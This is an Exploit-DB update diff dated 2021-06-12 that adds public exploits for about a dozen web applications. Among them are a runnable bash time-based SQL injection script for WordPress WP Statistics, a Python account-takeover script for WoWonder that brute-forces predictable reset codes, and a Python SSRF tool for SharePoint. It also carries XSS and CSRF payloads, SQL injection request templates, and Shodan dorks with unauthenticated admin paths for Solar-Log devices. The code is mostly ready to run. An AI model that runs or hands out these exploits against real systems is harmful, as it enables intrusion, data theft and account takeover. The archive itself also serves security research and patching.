DB: 2021-06-12

12 changes to exploits/shellcodes

WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)
Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)
Cerberus FTP Web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)
Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF)
OpenEMR 5.0.0 - Remote Code Execution (Authenticated)
WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF
Grocery crud 1.6.4 - 'order_by' SQL Injection
Solar-Log 500 2.8.2 - Incorrect Access Control
Solar-Log 500 2.8.2 - Unprotected Storage of Credentials
Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)
WoWonder Social Network Platform 3.1 - Authentication Bypass

exploits/cgi/webapps/49869.py

@@ -5,6 +5,7 @@
 # Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
 # Version: 2.25 - core update 156
 # Tested on: parrot os 5.7.0-2parrot2-amd64
+# CVE: CVE-2021-33393
 
 #!/usr/bin/python3
 

exploits/multiple/webapps/49980.txt

@@ -0,0 +1,80 @@
+# Exploit Title: Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)
+# Exploit Author: Abdulazeez Alaseeri
+# Software Link: https://www.accela.com/civic-platform/
+# Version: <= 21.1
+# Tested on: JBoss server/windows
+# Type: Web App
+# Date: 06/07/2021
+# CVE: CVE-2021-33904
+
+
+================================================================
+Accela Civic Platform Cross-Site-Scripting <= 21.1
+================================================================
+
+
+================================================================
+Request Heeaders start
+================================================================
+
+GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9 HTTP/1.1
+
+Host: Hidden for security reasons
+
+Cookie: JSESSIONID=FBjC0Zfg-H87ecWmTMDEcNo8HID1gB6rwBt5QC4Y.civpnode; LASTEST_REQUEST_TIME=1623004368673; g_current_language_ext=en_US; hostSignOn=true; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LATEST_SESSION_ID=lVkV3izKpk9ig1g_nqSktJ3YKjSbfwwdPj0YBFDO; LATEST_WEB_SERVER=1.1.1.1; LATEST_LB=1360578058.47873.0000
+
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+Upgrade-Insecure-Requests: 1
+
+Te: trailers
+
+Connection: close
+
+================================================================
+Request Heeaders end
+================================================================
+
+
+
+================================================================
+Response Heeaders start
+================================================================
+HTTP/1.1 200 OK
+
+Expires: Wed, 31 Dec 1969 23:59:59 GMT
+
+Cache-Control: no-cache
+
+X-Powered-By: JSP/2.3
+
+Set-Cookie: LASTEST_REQUEST_TIME=1623004478373; path=/; domain=.Hidden for security reasons; secure
+
+Set-Cookie: g_current_language_ext=en_US; path=/; domain=.Hidden for security reasons; secure
+
+Set-Cookie: hostSignOn=true; path=/; domain=.Hidden for security reasons; secure
+
+X-XSS-Protection: 0
+
+Pragma: No-cache
+
+Date: Sun, 06 Jun 2021 18:34:38 GMT
+
+Connection: close
+
+Content-Type: text/html;charset=UTF-8
+
+Content-Length: 13222
+================================================================
+Response Heeaders end
+================================================================
+
+
+You can notice that the parameter "servProvCode" is vulnerable to XSS.
+Payload: k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9

exploits/multiple/webapps/49981.txt

@@ -0,0 +1,62 @@
+# Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)
+# Date: 08/06/2021
+# Exploit Author: Mohammad Hossein Kaviyany
+# Vendor Homepage: www.cerberusftp.com
+# Software Link: https://www.cerberusftp.com/download/
+# Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier
+# Tested on: windows server 2016
+------------
+About Cerberus FTP Server (From Vendor Site) :     
+                                
+Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS, 
+FIPS 140-2 validated, and Active Directory and LDAP authentication.
+--------------------------------------------------------
+Exploit Detailes :
+
+This stored XSS bug happens when a user uploads an svg file with the following content :
+<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
+
+Exploit POC :
+
+# Vulnerable Path : /file/upload
+# Parameter: files (POST)
+# Vector: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
+
+#Payload:  
+
+POST /file/upload HTTP/1.1
+Host: target.com
+Connection: close
+Content-Length: 484
+sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAM6ZtOAsyklo6JG
+Origin: https://target.com
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://target.com/file/d/home/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: cftpSID=U02_5UCTumW3vFtt5PrlWwoD4k9ccxW0A87oCM8-jsM
+
+------WebKitFormBoundaryAAM6ZtOAsyklo6JG
+Content-Disposition: form-data; name="cd"
+
+/home
+------WebKitFormBoundaryAAM6ZtOAsyklo6JG
+Content-Disposition: form-data; name="csrftoken"
+
+z-Zlffq0sPaJErxOsMgL4ITcW1x3AuZo3XlZRP5GcKg
+------WebKitFormBoundaryAAM6ZtOAsyklo6JG
+Content-Disposition: form-data; name="files[]"; filename="file.svg"
+Content-Type: image/svg+xml
+
+<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
+
+------WebKitFormBoundaryAAM6ZtOAsyklo6JG--
+
+--------------------------

exploits/multiple/webapps/49985.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Grocery crud 1.6.4 - 'order_by' SQL Injection
+# Date: 11/06/1963
+# Exploit Author: TonyShavez
+# Vendor Homepage: https://www.grocerycrud.com/
+# Software Link: https://www.grocerycrud.com/downloads
+# Version: < v2.0.1
+# Tested on: [Linux Ubuntu]
+
+Proof Of concept : 
+=======================
+#Request:
+
+POST /path/to/ajax_list HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 68
+DNT: 1
+Connection: close
+
+page=1&per_page=100&order_b=&order_by[]={INJECT HERE}&search_field=&search_text=
+=======================
+#vulnerable parameter :
+
+order_by 
+=======================
+#type : [error-based]

exploits/multiple/webapps/49986.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Solar-Log 500 2.8.2 - Incorrect Access Control
+# Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP""
+# Date: 2021-06-11
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.solar-log.com/en/
+# Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/
+# Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013
+# Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/
+
+# 1. Description:
+# The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication,
+# which allows arbitrary remote attackers to gain administrative privileges by connecting to the server.
+# As a result, the attacker can modify configuration files and change the system status.
+
+# 2. Proof of Concept:
+# Access the /lan.html of Solar-Log 500 without ANY authentication,
+# and you can get gain administrative privileges to modify configuration files and change the system status.
+# http://<Your Modem IP>/lan.html

exploits/multiple/webapps/49987.txt

@@ -0,0 +1,20 @@
+# Exploit Title: Solar-Log 500 2.8.2 - Unprotected Storage of Credentials
+# Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP""
+# Date: 2021-06-11
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.solar-log.com/en/
+# Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/
+# Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013
+# Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/
+
+# 1. Description:
+# An issue was discovered in Solar-Log 500 prior to 2.8.2 Build 52 - 23.04.2013.
+# In /export.html, email.html, sms.html, the devices store plaintext passwords,
+# which may allow sensitive information to be read by someone with access to the device.
+
+# 2. Proof of Concept:
+# Browse the configuration page in Solar-Log 500,
+# we can find out that the passwords of FTP, SMTP, SMS services are stored in plaintext.
+# http://<Your Modem IP>/export.html
+# http://<Your Modem IP>/email.html
+# http://<Your Modem IP>/sms.html

exploits/php/webapps/49894.sh

@@ -0,0 +1,130 @@
+# Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)
+# Date: 20/05/2021
+# Exploit Author: Mansoor R (@time4ster)
+# CVSS Score: 7.5 (High)
+# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+# Version Affected: 13.0 to 13.0.7
+# Vendor URL: https://wordpress.org/plugins/wp-statistics/
+# Patch: Upgrade to wp-statistics 13.0.8 (or above)
+# Tested On: wp-statistics 13.0.6,13.0.7
+
+#!/bin/bash
+
+# Credits: 
+# https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
+
+# SQLmap Exploit for grepping database banner (automated):
+# sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --techniqu=T --dbms="mysql" -p "ID" -b
+
+# WARNINGS: 
+# Only test the exploit on websites you are authorized to.
+# The exploit will perform sleep for 3 seconds. Don't use on production server of organization without prior permissions.
+
+
+# Exploit
+# ==============
+
+echo
+echo "============================================================================================"
+echo "Unauthenticated Time-Based Blind SQL Injection in WP Statistics < 13.0.8"
+echo
+echo "By: Mansoor R (@time4ster)"
+echo "============================================================================================"
+echo
+
+
+
+function printHelp()
+{
+	echo -e "
+Usage:
+
+-u|--wp-url      <string>		Wordpress target url
+-k|--check				Only checks whether vulnerable version of plugin is running or not.
+-h|--help				Print Help menu
+
+
+Example:
+./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress 
+./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress --check
+"
+}
+
+#Processing arguments
+check="false"
+exploit="true"
+while [[ "$#" -gt 0 ]]
+do
+key="$1"
+
+case "$key" in
+    -u|--wp-url)
+	    wp_url="$2"
+	    shift
+	    shift # past argument
+	    ;;
+    -k|--check)
+	    check="true"
+	    exploit="false"
+	    shift
+	    shift
+	    ;;
+    -h|--help)
+	    printHelp
+	    exit
+	    shift
+	    ;;
+    *)   
+	    echo [-] Enter valid options
+	    exit
+	    ;;
+esac
+done
+
+[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL. Use -h for help menu." && exit
+
+function checkVersion()
+{
+	url="$1"
+	[[ -z "$url" ]] && return
+	target_endpoint="$url/wp-content/plugins/wp-statistics/readme.txt"
+	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
+
+	version=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i -m 1 "stable tag:" | grep -o -E "[0-9]+\.[0-9]+\.[0-9]+")
+	[[ -n "$version" ]] && echo "[+] WP-statistical Plugin Version: $version" 
+	[[ -z "$version" ]] && echo "[-] WP-statistical Unable to detect version." && return
+
+	vuln_version=(13.0.7 13.0.6 13.0.5 13.0.4 13.0.3 13.0.1 13.0)
+	is_vulnerable="false"
+	for v in "${vuln_version[@]}";do 
+		[[ "$version" == "$v" ]] && is_vulnerable="true" && break	
+	done
+	[[ "$is_vulnerable" == "true" ]] && echo "[++] Target $url is Vulnerable"
+	[[ "$is_vulnerable" == "false" ]] && echo "[--] Target $url is  Not Vulnerable"
+}
+
+function exploitPlugin()
+{
+	url="$1"
+	target_endpoint="$url/wp-admin/admin.php"
+	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
+	sleep=3
+	payload="ID=1 AND (SELECT * from (select SLEEP($sleep))a)"
+	
+	echo -e -n "[!] Caution: You are going to execute sleep database command for $sleep seconds. Proceed only if you have permission.\nPress (Y/y) to continue or any other key to exit: "
+	read choice
+	[[ "$choice" != "y" ]] && [[ "$choice" != "Y" ]] && return
+
+	echo
+	echo "[+] Trying Payload:"	
+	set -x
+	curl -v -ks -G --user-agent "$user_agent" "$target_endpoint" \
+		--data-urlencode "page=wps_pages_page" \
+		--data-urlencode "type=1" \
+		--data-urlencode "$payload"
+	
+
+}
+
+[[ "$check" == "true" ]] && checkVersion "$wp_url"
+[[ "$exploit" == "true" ]] && exploitPlugin "$wp_url"

exploits/php/webapps/49984.html

@@ -0,0 +1,20 @@
+# Exploit Title: WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF
+# Date: 2/10/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/database-backups/
+# Version: 1.2.2.6
+# Tested on: Windows 10
+# CVE: CVE-2021-24174
+
+1. Description:
+This plugin allows admins to create and download database backups. A CSRF can create DB backups stored publicly in the uploads directory.
+
+2. Proof of Concept:
+
+<form action="http://localhost/wp-admin/tools.php?page=database-backups" method="post">
+    <input type="hidden" name="do_backup_manually" value="1">
+    <input type="submit" class="button button-primary" value="Do backup" autocomplete="off">            
+</form>
+
+Backups can be accessed by the following URL.
+http://localhost/wp-content/uploads/database-backups/

exploits/php/webapps/49988.txt

@@ -0,0 +1,26 @@
+# Exploit Title: Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)
+# Date: 05–02–2021
+# Exploit Author: Avinash R
+# Vendor Homepage: https://zenar.io/
+# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8
+# Version: 8.8.52729
+# Tested on: Windows 10 Pro (No OS restrictions)
+# CVE : CVE-2021–27673
+# Reference: https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38
+
+##### Step To Reproduce #####
+
+1) Login to the admin page of Zenario CMS with admin credentials, which is
+http://server_ip/zenario/admin.php
+
+2) Click on, New → HTML page to create a new sample page and intercept it
+with your interceptor.
+
+3) Just a single quote on the 'cID' parameter will confirm the SQL
+injection.
+
+4) After confirming that the 'cID' parameter is vulnerable to SQL
+injection, feeding the request to SQLMAP will do the rest of the work for
+you.
+
+############ End ############

exploits/php/webapps/49989.py

@@ -0,0 +1,46 @@
+# Exploit Title: WoWonder Social Network Platform 3.1 - Authentication Bypass
+# Date: 11.06.2021
+# Exploit Author: securityforeveryone.com
+# Researchers : Security For Everyone Team - https://securityforeveryone.com
+# Vendor Homepage: https://www.wowonder.com/
+# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302
+# Version: < 3.1
+# Tested on: Linux/Windows
+
+'''
+DESCRIPTION
+
+In WoWonder < 3.1, remote attackers can take over any account due to the weak cryptographic algorithm in recover.php. The code parameter is easily predicted from the time of day.
+The vulnerability is found the "code" parameter in password reset link. The password reset code can be estimated by combining the password reset link time and the random value generated between 111 and 999.
+if an attacker exploits this vulnerability, attacker may access all accounts in WoWonder application.
+
+ABOUT SECURITY FOR EVERYONE TEAM
+
+We are a team that has been working on cyber security in the industry for a long time.
+In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
+We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools
+'''
+
+import requests
+import email.utils as eut
+import calendar, time;
+import hashlib, re;
+
+url = "http://wowonderlab:80/wowonder/" #change this with your target
+myheaders = {"X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close"}
+recoverdata = {"recoveremail": "wowondertest@securityforeveryone.com"}  #change this email with your registered wowonder email address
+req = requests.post(url+"requests.php?f=recover", headers=myheaders, data=recoverdata)
+b = eut.parsedate(req.headers["Date"])
+respepoch = calendar.timegm(time.strptime("{0}-{1}-{2} {3}:{4}:{5}".format(b[0],b[1],b[2],b[3],b[4],b[5]), '%Y-%m-%d %H:%M:%S'))
+
+for token in range(111,1000):
+    str2hash = "{0}{1}".format(token,respepoch)
+    email_code = hashlib.md5(str2hash.encode()).hexdigest()
+
+    req_reset = requests.get(url+"index.php?link1=reset-password&code=1_{0}".format(email_code))
+    if len(re.findall("New password",req_reset.text)) == 1:
+        print(email_code)
+        resetdata = {"password": "10711071", "id": "1_"+email_code}
+        reqtoken = requests.post(url+"requests.php?f=reset_password", headers=myheaders, data=resetdata)
+        print(reqtoken.headers['Set-Cookie'])
+        break

exploits/windows/webapps/49982.py

@@ -0,0 +1,132 @@
+# Exploit Title: Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF)
+# Date: 09 Jun 2021
+# Exploit Author: Alex Birnberg
+# Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=57462
+# Version: 16.0.10372.20060
+# Tested on: Windows Server 2019
+# CVE : CVE-2021-31950
+
+#!/usr/bin/env python3
+
+import html
+import random
+import string
+import xml.sax.saxutils
+import textwrap
+import requests
+import argparse
+import xml.etree.ElementTree as ET
+from requests_ntlm2 import HttpNtlmAuth
+from urllib.parse import urlencode, urlparse
+
+class Exploit:
+  def __init__(self, args):
+    o = urlparse(args.url)
+    self.url = args.url
+    self.service = o.path
+    self.username = args.username
+    self.password = args.password
+    self.target = args.target
+    self.headers = args.header 
+    self.method = args.request
+    self.data = args.data
+    self.content_type = args.content_type
+    self.s = requests.Session()
+    self.s.auth = HttpNtlmAuth(self.username, self.password)
+    self.s.headers = {
+      'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'
+    }
+    self.s.proxies = {
+      'http': 'http://127.0.0.1:8080'
+    }
+
+  def trigger(self):
+    headers = ''
+    if self.headers:
+      for header in self.headers:
+        header = list(map(lambda x: x.strip(), header.split(':')))
+        if len(header) != 2:
+          continue
+        headers += '<dataurl:Header name="{}">{}</dataurl:Header>'.format(header[0], header[1])
+    method = ''
+    bypass_local = ''
+    if self.method and self.method.upper() == 'POST':
+      method = 'HTTP Post'
+    else:
+      method = 'HTTP Get'
+      bypass_local = '<dataurl:Arguments><dataurl:Argument Name="{0}">{0}</dataurl:Argument></dataurl:Arguments>'.format(''.join(random.choice(string.ascii_letters) for i in range(16)))
+    content_type = ''
+    if self.content_type and len(self.content_type):
+      content_type = '<dataurl:ContentType>{}</dataurl:ContentType>'.format(self.content_type)
+    data = ''
+    if self.data and len(self.data):
+      data = '<dataurl:PostData Encoding="Decode">{}</dataurl:PostData>'.format(html.escape(self.data).encode('ascii', 'xmlcharrefreplace').decode('utf-8'))
+    query_xml = textwrap.dedent('''\
+    <udc:DataSource xmlns:udc="http://schemas.microsoft.com/data/udc" xmlns:udcs="http://schemas.microsoft.com/data/udc/soap" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:dsp="http://schemas.microsoft.com/sharepoint/dsp" xmlns:dataurl="http://schemas.microsoft.com/sharepoint/dsp/xmlurl">
+      <udc:ConnectionInfo>
+        <udcs:Location href="">XMLURLDataAdapter</udcs:Location>
+        <soap:Header>
+          <dsp:versions>
+          </dsp:versions>
+          <dsp:request method="query" />
+        </soap:Header>
+        <soap:Body>
+          <dsp:queryRequest>
+            <dsp:ptQuery>
+              <dataurl:Headers>
+                <dataurl:Url href="{}" Method="{}"/>
+                {}
+                {}
+                {}
+                {}
+              </dataurl:Headers>
+            </dsp:ptQuery>
+          </dsp:queryRequest>
+        </soap:Body>
+      </udc:ConnectionInfo>
+    </udc:DataSource>'''.format(self.target, method, bypass_local, headers, data, content_type))
+    query_xml = xml.sax.saxutils.escape(query_xml.replace('\r', '').replace('\n', ''))	
+    data = textwrap.dedent('''\
+      <?xml version="1.0" encoding="utf-8"?>
+      <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+        <soap:Body>
+          <GetXmlDataFromDataSource xmlns="http://microsoft.com/sharepoint/webpartpages">
+            <queryXml>{}</queryXml>
+          </GetXmlDataFromDataSource>
+        </soap:Body>
+      </soap:Envelope>'''.format(query_xml))
+    r = self.soap('webpartpages', 'http://microsoft.com/sharepoint/webpartpages/GetXmlDataFromDataSource', data)
+    root = ET.fromstring(r.content)
+    try:
+      namespaces = {
+        'soap': 'http://schemas.xmlsoap.org/soap/envelope/'
+      }
+      value = list(root.find('soap:Body', namespaces).iter())[2]   
+      if value.tag == 'faultcode':
+        print('Error:', list(root.find('soap:Body', namespaces).iter())[3].text)
+      else:
+        print(value.text)
+    except:
+      print(r.content)
+      pass
+
+  def soap(self, service, action, data):
+    headers = {
+      'SOAPAction': '"{}"'.format(action),
+      'Host': 'localhost',
+      'Content-Type': 'text/xml; charset=utf-8',
+    }
+    return self.s.post('{}/_vti_bin/{}.asmx'.format(self.url, service), headers=headers, data=data)
+
+if __name__ == '__main__':
+  parser = argparse.ArgumentParser()
+  parser.add_argument('--url', help='Base URL', required=True, metavar='<url>')
+  parser.add_argument('--username', help='Username of team site owner', required=True, metavar='<username>')
+  parser.add_argument('--password', help='Password of team site owner', required=True, metavar='<password>')
+  parser.add_argument('--target', help='Target URL to work with', required=True, metavar='<target>')
+  parser.add_argument('-H', '--header', help='Pass custom header(s) to server', action='append', metavar='<header>')
+  parser.add_argument('-X', '--request', help='Specify request command to use', metavar='<command>')
+  parser.add_argument('-d', '--data', help='HTTP POST data', metavar='<data>') 
+  parser.add_argument('-c', '--content-type', help='Value for the "Content-Type" header', metavar='<type>')
+  exploit = Exploit(parser.parse_args())
+  exploit.trigger()

files_exploits.csv

@@ -44084,6 +44084,7 @@ id,file,description,date,author,type,platform,port
 49886,exploits/php/webapps/49886.txt,"COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass)",2021-05-19,"Rohit Burke",webapps,php,
 49887,exploits/php/webapps/49887.txt,"COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS)",2021-05-19,"Rohit Burke",webapps,php,
 49891,exploits/multiple/webapps/49891.txt,"Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)",2021-05-21,nu11secur1ty,webapps,multiple,
+49894,exploits/php/webapps/49894.sh,"WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)",2021-05-21,"Mansoor R",webapps,php,
 49895,exploits/windows/webapps/49895.rb,"Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)",2021-05-21,mekhalleh,webapps,windows,
 49897,exploits/multiple/webapps/49897.txt,"Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)",2021-05-24,"Emir Polat",webapps,multiple,
 49901,exploits/java/webapps/49901.txt,"Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)",2021-05-24,"Marek Toth",webapps,java,
@@ -44134,3 +44135,13 @@ id,file,description,date,author,type,platform,port
 49973,exploits/php/webapps/49973.py,"GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)",2021-06-09,legend,webapps,php,
 49974,exploits/php/webapps/49974.txt,"Student Result Management System 1.0 - 'class' SQL Injection",2021-06-10,"Riadh Benlamine",webapps,php,
 49975,exploits/php/webapps/49975.txt,"TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)",2021-06-10,"Mert Daş",webapps,php,
+49980,exploits/multiple/webapps/49980.txt,"Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)",2021-06-11,"Abdulazeez Alaseeri",webapps,multiple,
+49981,exploits/multiple/webapps/49981.txt,"Cerberus FTP Web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)",2021-06-11,"Mohammad Hossein Kaviyany",webapps,multiple,
+49982,exploits/windows/webapps/49982.py,"Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF)",2021-06-11,"Alex Birnberg",webapps,windows,
+49983,exploits/php/webapps/49983.py,"OpenEMR 5.0.0 - Remote Code Execution (Authenticated)",2021-06-11,"Ron Jost",webapps,php,
+49984,exploits/php/webapps/49984.html,"WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF",2021-06-11,0xB9,webapps,php,
+49985,exploits/multiple/webapps/49985.txt,"Grocery crud 1.6.4 - 'order_by' SQL Injection",2021-06-11,TonyShavez,webapps,multiple,
+49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",2021-06-11,Luca.Chiou,webapps,multiple,
+49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",2021-06-11,Luca.Chiou,webapps,multiple,
+49988,exploits/php/webapps/49988.txt,"Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)",2021-06-11,"Avinash R",webapps,php,
+49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,